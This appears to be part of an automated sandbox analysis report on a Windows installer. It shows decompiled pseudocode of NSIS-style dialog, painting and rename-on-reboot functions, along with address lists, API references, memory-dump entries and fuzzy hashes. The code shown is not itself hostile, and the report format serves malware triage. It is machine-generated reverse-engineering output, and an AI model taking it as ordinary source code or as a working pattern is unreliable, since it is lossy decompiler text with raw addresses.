							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                    0x00403e06
                                                                    0x00403e0f
                                                                    0x00403f50
                                                                    0x00403f54
                                                                    0x00403f58
                                                                    0x00403f5a
                                                                    0x00403f5f
                                                                    0x00403f6a
                                                                    0x00403f75
                                                                    0x00403f7a
                                                                    0x00403f7c
                                                                    0x00403f7e
                                                                    0x00403f81
                                                                    0x00403f86
                                                                    0x00403f94
                                                                    0x00403fa1
                                                                    0x00403fa8
                                                                    0x00403fa8
                                                                    0x00403fa9
                                                                    0x00403fa9
                                                                    0x00403fae
                                                                    0x00403fb4
                                                                    0x00403fbb
                                                                    0x00403fc1
                                                                    0x00403fc3
                                                                    0x00404003
                                                                    0x00404008
                                                                    0x0040400d
                                                                    0x0040400d
                                                                    0x00404012
                                                                    0x0040401b
                                                                    0x0040401d
                                                                    0x00404022
                                                                    0x00404028
                                                                    0x0040402c
                                                                    0x0040402c
                                                                    0x00404031
                                                                    0x00404037
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404042
                                                                    0x00404048
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404051
                                                                    0x00404059
                                                                    0x0040405e
                                                                    0x00404061
                                                                    0x00404067
                                                                    0x0040406c
                                                                    0x0040406f
                                                                    0x00404075
                                                                    0x0040407a
                                                                    0x0040407d
                                                                    0x00404083
                                                                    0x0040408b
                                                                    0x00404091
                                                                    0x00404097
                                                                    0x0040409b
                                                                    0x004040a2
                                                                    0x004040a2
                                                                    0x004040a2
                                                                    0x004040ac
                                                                    0x004040be
                                                                    0x004040ca
                                                                    0x004040cf
                                                                    0x004040d9
                                                                    0x004040df
                                                                    0x004040e1
                                                                    0x004040e6
                                                                    0x004040e3
                                                                    0x004040e3
                                                                    0x004040e3
                                                                    0x004040f6
                                                                    0x0040410e
                                                                    0x00404110
                                                                    0x00404116
                                                                    0x0040412b
                                                                    0x00404118
                                                                    0x00404121
                                                                    0x00404123
                                                                    0x00404123
                                                                    0x00404131
                                                                    0x00404142
                                                                    0x00404153
                                                                    0x0040415a
                                                                    0x00404160
                                                                    0x00404164
                                                                    0x00404169
                                                                    0x0040416b
                                                                    0x00000000
                                                                    0x00404171
                                                                    0x00404171
                                                                    0x00404173
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404179
                                                                    0x0040417d
                                                                    0x004041a2
                                                                    0x004041a8
                                                                    0x004041ae
                                                                    0x004041b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004041d6
                                                                    0x004041dc
                                                                    0x004041de
                                                                    0x004041e3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004041e9
                                                                    0x004041ec
                                                                    0x004041ef
                                                                    0x00404206
                                                                    0x00404212
                                                                    0x0040422b
                                                                    0x00404231
                                                                    0x00404235
                                                                    0x0040423a
                                                                    0x00404240
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040424a
                                                                    0x00404255
                                                                    0x00000000
                                                                    0x00404255
                                                                    0x0040417f
                                                                    0x00404185
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040418b
                                                                    0x00404191
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404197
                                                                    0x0040416b
                                                                    0x00404262
                                                                    0x0040426e
                                                                    0x00404275
                                                                    0x00000000
                                                                    0x00403fc5
                                                                    0x00403fc5
                                                                    0x00403fc8
                                                                    0x00403ffb
                                                                    0x00403ffb
                                                                    0x00403ffd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403ffd
                                                                    0x00403fca
                                                                    0x00403fce
                                                                    0x00403fd3
                                                                    0x00403fd5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403fe5
                                                                    0x00403fed
                                                                    0x00000000
                                                                    0x00403ff3
                                                                    0x00403e21
                                                                    0x00403e21
                                                                    0x00403e25
                                                                    0x00403e2a
                                                                    0x00403e39
                                                                    0x00403e39
                                                                    0x00403e42
                                                                    0x00403e4b
                                                                    0x00403e56
                                                                    0x00403e56
                                                                    0x00403e62
                                                                    0x00403e7e
                                                                    0x00403e81
                                                                    0x00403e94
                                                                    0x00403e9a
                                                                    0x00403f3d
                                                                    0x00000000
                                                                    0x00403f46
                                                                    0x00403ea0
                                                                    0x00403ead
                                                                    0x00403eaf
                                                                    0x00403eb1
                                                                    0x00403ed0
                                                                    0x00403ed0
                                                                    0x00403ed3
                                                                    0x00403ed8
                                                                    0x00403edb
                                                                    0x00403eeb
                                                                    0x00403eec
                                                                    0x00403eee
                                                                    0x00403f24
                                                                    0x00403f37
                                                                    0x00000000
                                                                    0x00403f37
                                                                    0x00403ef0
                                                                    0x00403ef6
                                                                    0x00403f0f
                                                                    0x00403f14
                                                                    0x00403f16
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403f18
                                                                    0x00403f04
                                                                    0x00403f04
                                                                    0x00403f06
                                                                    0x00403f06
                                                                    0x00000000
                                                                    0x00403f06
                                                                    0x00403ef9
                                                                    0x00403efe
                                                                    0x00000000
                                                                    0x00403efe
                                                                    0x00403edd
                                                                    0x00403ee3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403ee5
                                                                    0x00000000
                                                                    0x00403ee5
                                                                    0x00403ed5
                                                                    0x00000000
                                                                    0x00403ed5
                                                                    0x00403ebb
                                                                    0x00403ec2
                                                                    0x00403ec8
                                                                    0x00403eca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403eca
                                                                    0x00403e86
                                                                    0x00000000
                                                                    0x00403e64
                                                                    0x00403e6a
                                                                    0x00403e74
                                                                    0x0040427b
                                                                    0x00404281
                                                                    0x00404283
                                                                    0x00404289
                                                                    0x0040428e
                                                                    0x00404294
                                                                    0x00404294
                                                                    0x00404289
                                                                    0x0040429e
                                                                    0x00000000
                                                                    0x0040429e
                                                                    0x00403e62

                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                    • ShowWindow.USER32(?), ref: 00403E56
                                                                    • DestroyWindow.USER32 ref: 00403E6A
                                                                    • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E86
                                                                    • GetDlgItem.USER32 ref: 00403EA7
                                                                    • SendMessageA.USER32 ref: 00403EBB
                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                    • GetDlgItem.USER32 ref: 00403F70
                                                                    • GetDlgItem.USER32 ref: 00403F7A
                                                                    • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403F94
                                                                    • SendMessageA.USER32 ref: 00403FE5
                                                                    • GetDlgItem.USER32 ref: 0040408B
                                                                    • ShowWindow.USER32(00000000,?), ref: 004040AC
                                                                    • EnableWindow.USER32(?,?), ref: 004040BE
                                                                    • EnableWindow.USER32(?,?), ref: 004040D9
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040EF
                                                                    • EnableMenuItem.USER32 ref: 004040F6
                                                                    • SendMessageA.USER32 ref: 0040410E
                                                                    • SendMessageA.USER32 ref: 00404121
                                                                    • lstrlenA.KERNEL32(0042A8B8,?,0042A8B8,00000000), ref: 0040414B
                                                                    • SetWindowTextA.USER32(?,0042A8B8), ref: 0040415A
                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040428E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                    • String ID:
                                                                    • API String ID: 184305955-0
                                                                    • Opcode ID: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                    • Instruction ID: d5b7a152eccfdaa35e4c53a1a76e60acfbe2d5449824965e5503988bb7e30882
                                                                    • Opcode Fuzzy Hash: 0747cf473462c633210311af9825ea032a0e3c09bf9efde6129466eabca98a82
                                                                    • Instruction Fuzzy Hash: 34C1E671604204ABDB216F62EE85E2B3BB8FB85349F40053EF641B51F0CB795892DB2D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040443C, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E0040443C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429884 =  *0x429884 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404338(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3e0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_push(1);
								_t40 =  &_v8; // 0x42e3e0
								E004046E0(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f448, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f448, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429884 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a090 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F3(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004046BC();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ec1c; // 0x53b4aa
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f498;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00404407;
				E004042D1(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042D1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042F3( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404306(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f454 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x429884 = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429884 = 0;
				return 0;
			}


















                                                                    0x0040444c
                                                                    0x00404571
                                                                    0x004045cd
                                                                    0x004045d1
                                                                    0x0040469e
                                                                    0x004046a0
                                                                    0x004046a0
                                                                    0x004046a6
                                                                    0x004046a6
                                                                    0x004046a9
                                                                    0x00000000
                                                                    0x004046b0
                                                                    0x004045df
                                                                    0x004045e1
                                                                    0x004045eb
                                                                    0x004045f6
                                                                    0x004045f9
                                                                    0x004045fc
                                                                    0x00404607
                                                                    0x0040460a
                                                                    0x00404611
                                                                    0x0040461f
                                                                    0x00404637
                                                                    0x00404639
                                                                    0x0040463b
                                                                    0x00404641
                                                                    0x00404650
                                                                    0x00404652
                                                                    0x00404652
                                                                    0x00404611
                                                                    0x0040465c
                                                                    0x00000000
                                                                    0x00404667
                                                                    0x0040466b
                                                                    0x0040467c
                                                                    0x0040467c
                                                                    0x00404682
                                                                    0x00404690
                                                                    0x00404690
                                                                    0x00000000
                                                                    0x00404694
                                                                    0x0040465c
                                                                    0x0040457c
                                                                    0x00000000
                                                                    0x00404590
                                                                    0x00404596
                                                                    0x0040459c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004045c1
                                                                    0x004045c3
                                                                    0x004045c8
                                                                    0x00000000
                                                                    0x004045c8
                                                                    0x0040457c
                                                                    0x00404452
                                                                    0x00404455
                                                                    0x0040445a
                                                                    0x0040445c
                                                                    0x0040446b
                                                                    0x0040446b
                                                                    0x00404472
                                                                    0x00404475
                                                                    0x00404477
                                                                    0x0040447c
                                                                    0x00404485
                                                                    0x0040448b
                                                                    0x00404497
                                                                    0x0040449a
                                                                    0x004044a3
                                                                    0x004044a8
                                                                    0x004044ab
                                                                    0x004044b0
                                                                    0x004044c7
                                                                    0x004044ce
                                                                    0x004044e1
                                                                    0x004044e4
                                                                    0x004044f9
                                                                    0x00404500
                                                                    0x00404505
                                                                    0x0040450a
                                                                    0x0040450a
                                                                    0x00404519
                                                                    0x00404528
                                                                    0x0040453a
                                                                    0x0040453f
                                                                    0x0040454f
                                                                    0x00404551
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                    • String ID: N$B
                                                                    • API String ID: 3103080414-4074832742
                                                                    • Opcode ID: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                    • Instruction ID: c8b3317feb23aa92da8c88ca1c3cf39d399e1714613d550ff25a6b2d3c0ef38e
                                                                    • Opcode Fuzzy Hash: b933b9ecc43e31cfc63bc3248a7489c66971f92386d9d85ac5963e61a52be2be
                                                                    • Instruction Fuzzy Hash: 3761A1B1A40209BFDB109F61CD45F6A3BA9FB84744F00443AFB05BA1D1D7BDA9618F98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 90%
                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f454;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f448;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                    0x0040100a
                                                                    0x00401039
                                                                    0x00401047
                                                                    0x0040104d
                                                                    0x00401051
                                                                    0x0040105b
                                                                    0x00401061
                                                                    0x00401064
                                                                    0x004010f3
                                                                    0x00401089
                                                                    0x0040108c
                                                                    0x004010a6
                                                                    0x004010bd
                                                                    0x004010cc
                                                                    0x004010cf
                                                                    0x004010d5
                                                                    0x004010d9
                                                                    0x004010e4
                                                                    0x004010ed
                                                                    0x004010ef
                                                                    0x004010ef
                                                                    0x00401100
                                                                    0x00401105
                                                                    0x0040110d
                                                                    0x00401110
                                                                    0x00401112
                                                                    0x00401118
                                                                    0x0040111f
                                                                    0x00401126
                                                                    0x00401130
                                                                    0x00401142
                                                                    0x00401156
                                                                    0x00401160
                                                                    0x00401165
                                                                    0x00401165
                                                                    0x00401110
                                                                    0x0040116e
                                                                    0x00000000
                                                                    0x00401178
                                                                    0x00401010
                                                                    0x00401013
                                                                    0x00401015
                                                                    0x0040101f
                                                                    0x0040101f
                                                                    0x00000000

                                                                    APIs
                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32 ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F$Setup Setup
                                                                    • API String ID: 941294808-1602013819
                                                                    • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                    • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                    • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                    • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405EBC, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405EBC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x42c648 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
						_t53 = _t52 + 0x10;
						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405DA1(_t24 + _t46, 0x42c248, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E8D(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE6(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                    0x00405ebc
                                                                    0x00405ec5
                                                                    0x00405ecc
                                                                    0x00405ee0
                                                                    0x00405f08
                                                                    0x00405f13
                                                                    0x00405f17
                                                                    0x00405f37
                                                                    0x00405f3e
                                                                    0x00405f48
                                                                    0x00405f55
                                                                    0x00405f5a
                                                                    0x00405f5f
                                                                    0x00405f63
                                                                    0x00405f72
                                                                    0x00405f74
                                                                    0x00405f81
                                                                    0x00405f85
                                                                    0x00406020
                                                                    0x00000000
                                                                    0x00405f9b
                                                                    0x00405fa8
                                                                    0x00405fcc
                                                                    0x00405fd0
                                                                    0x00405fef
                                                                    0x00405ff3
                                                                    0x00405ff3
                                                                    0x00405ff5
                                                                    0x00405ffe
                                                                    0x00406009
                                                                    0x00406014
                                                                    0x0040601a
                                                                    0x00000000
                                                                    0x0040601a
                                                                    0x00405fd2
                                                                    0x00405fd5
                                                                    0x00405fe0
                                                                    0x00405fdc
                                                                    0x00405fde
                                                                    0x00405fdf
                                                                    0x00405fdf
